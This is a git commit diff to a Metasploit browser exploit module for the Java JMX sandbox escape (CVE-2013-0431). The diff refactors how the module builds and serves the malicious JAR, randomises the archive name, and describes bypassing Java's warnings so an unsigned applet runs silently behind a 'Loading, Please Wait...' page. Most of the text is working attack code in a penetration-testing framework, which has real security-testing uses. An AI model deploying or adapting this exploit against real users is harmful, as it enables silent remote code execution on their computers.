description and references updated

2013-02-20 18:14:53 +01:00 · 2013-02-20 18:14:53 +01:00 · bf216cca5c
parent da9e58ef79
commit bf216cca5c
1 changed files with 35 additions and 30 deletions
--- a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb
+++ b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb
@ -22,9 +22,10 @@ class Metasploit3 < Msf::Exploit::Remote
 		super( update_info( info,
 			'Name'          => 'Java Applet JMX Remote Code Execution',
 			'Description'   => %q{
-					This module abuses the JMX classes from a Java Applet to run arbitrary Java
-				code outside of the sandbox as exploited in the wild in February of 2013. The
-				vulnerability affects Java version 7u11 and earlier.
+					This module abuses the JMX classes from a Java Applet to run arbitrary Java code
+				outside of the sandbox as exploited in the wild in February of 2013. Additionally,
+				this module bypasses default security settings introduced in Java 7 Update 10 to run
+				unsigned applet without displaying any warning to the user.
 			},
 			'License'       => MSF_LICENSE,
 			'Author'        =>
@ -42,7 +43,8 @@ class Metasploit3 < Msf::Exploit::Remote
 					[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf' ],
 					[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf' ],
 					[ 'URL', 'http://security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html' ],
-					[ 'URL', 'http://pastebin.com/QWU1rqjf' ]
+					[ 'URL', 'http://pastebin.com/QWU1rqjf' ],
+					[ 'URL', 'http://malware.dontneedcoffee.com/2013/02/cve-2013-0431-java-17-update-11.html' ]
 				],
 			'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
 			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
@ -83,43 +85,46 @@ class Metasploit3 < Msf::Exploit::Remote

 		case request.uri
 		when /\.jar$/i
-			paths = [
-				[ "Exploit.ser" ],
-				[ "Exploit.class" ],
-				[ "B.class" ]
-			]
-
-			p = regenerate_payload(cli)
-
-			jar  = p.encoded_jar
-
-			paths.each do |path|
-				1.upto(path.length - 1) do |idx|
-					full = path[0,idx].join("/") + "/"
-					if !(jar.entries.map{|e|e.name}.include?(full))
-						jar.add_file(full, '')
-					end
-				end
-				fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2013-0431", path ), "rb")
-				data = fd.read(fd.stat.size)
-				jar.add_file(path.join("/"), data)
-				fd.close
-			end
-
-			print_status("Sending Applet.jar")
-			send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
+			print_status("Sending JAR")
+			send_response( cli, generate_jar, { 'Content-Type' => "application/octet-stream" } )
 		when /\/$/
+			print_status("Sending HTML")
 			send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
 		else
 			send_redirect(cli, get_resource() + '/', '')
 		end
+	end

+	def generate_jar
+		paths = [
+			[ "Exploit.ser" ],
+			[ "Exploit.class" ],
+			[ "B.class" ]
+		]
+
+		p = regenerate_payload(cli)
+
+		jar  = p.encoded_jar
+
+		paths.each do |path|
+			1.upto(path.length - 1) do |idx|
+				full = path[0,idx].join("/") + "/"
+				if !(jar.entries.map{|e|e.name}.include?(full))
+					jar.add_file(full, '')
+				end
+			end
+			fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2013-0431", path ), "rb")
+			data = fd.read(fd.stat.size)
+			jar.add_file(path.join("/"), data)
+			fd.close
+		end
+		return  jar.pack
 	end

 	def generate_html
 		html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
 		html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
-		html += %Q|<embed object="Exploit.ser" type="application/x-java-applet;version=1.6" archive="sample.jar"></embed>|
+		html += %Q|<embed object="Exploit.ser" type="application/x-java-applet;version=1.6" archive="#{rand_text_alpha(4+rand(4))}.jar"></embed>|
 		html += %Q|</applet></body></html>|
 		return html
 	end